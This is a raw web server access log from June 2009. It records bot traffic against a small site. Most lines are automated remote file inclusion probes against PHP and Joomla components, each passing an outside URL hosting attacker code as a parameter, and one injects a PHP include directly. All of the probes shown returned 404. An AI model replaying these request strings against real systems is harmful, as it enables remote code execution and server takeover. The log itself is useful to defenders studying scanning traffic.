218.234.21.178 - - [28/Jun/2009:22:10:50 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:10:50 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:10:50 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.55.209.2 - - [28/Jun/2009:22:11:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.209.2 - - [28/Jun/2009:22:11:29 -0700] "GET /logs/access_090601.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:12:00 -0700] "GET /logs/access_090126.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:12:53 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:12:53 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:12:53 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:14:57 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:14:57 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:14:57 -0700] "GET /logs/access_090112.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:15:01 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:15:01 -0700] "GET /logs/access_090112.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:15:01 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.30.81.181 - - [28/Jun/2009:22:16:36 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:51 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:51 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:22:16:52 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:54 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:54 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:56 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:56 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:16:56 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:17:28 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:17:28 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:22:17:28 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:17:48 -0700] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:17:52 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:18:17 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:18:17 -0700] "GET /phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:18:17 -0700] "GET /logs/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:20:48 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
121.165.73.157 - - [28/Jun/2009:22:20:56 -0700] "GET /logs/access_090126.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [28/Jun/2009:22:20:59 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:21:00 -0700] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:24:08 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:24:08 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:24:09 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:24:19 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:24:19 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:24:19 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:24:26 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:24:26 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:24:27 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:22:26:04 -0700] "GET /phphtml.php?htmlclass_path=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:22:26:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:22:26:04 -0700] "GET /logs/access_090413.log/phphtml.php?htmlclass_path=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:22:26:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:22:26:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:27:07 -0700] "GET /logs/access_090413.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
59.125.5.1 - - [28/Jun/2009:22:27:53 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:28:49 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:28:50 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:28:50 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:29:03 -0700] "GET /logs/access_090413.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:32:13 -0700] "GET /logs/access.log%20%20//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:32:13 -0700] "GET /index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:32:13 -0700] "GET /logs//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:24 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:24 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:24 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:34:28 -0700] "GET /logs/access_090126.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:34:29 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [28/Jun/2009:22:34:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:33 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:34:33 -0700] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:34:43 -0700] "GET /logs/access_090126.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:34:44 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.89 - - [28/Jun/2009:22:34:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:35:48 -0700] "GET /logs/access.log//index.php?sayfa=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:35:48 -0700] "GET /index.php?sayfa=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:35:48 -0700] "GET /logs//index.php?sayfa=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:36:49 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:36:49 -0700] "GET /logs/access_090413.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:36:50 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
38.117.93.134 - - [28/Jun/2009:22:36:55 -0700] "GET /logs/access.log//index.php?sayfa=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
38.117.93.134 - - [28/Jun/2009:22:36:55 -0700] "GET /index.php?sayfa=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
38.117.93.134 - - [28/Jun/2009:22:36:55 -0700] "GET /logs//index.php?sayfa=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:02 -0700] "GET /logs/access_090413.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:02 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:02 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:11 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:11 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:39:11 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:37 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:37 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:38 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:50 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:50 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:51 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:54 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:54 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:39:54 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:05 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:05 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:05 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:40:06 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:40:06 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:40:06 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:27 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:27 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
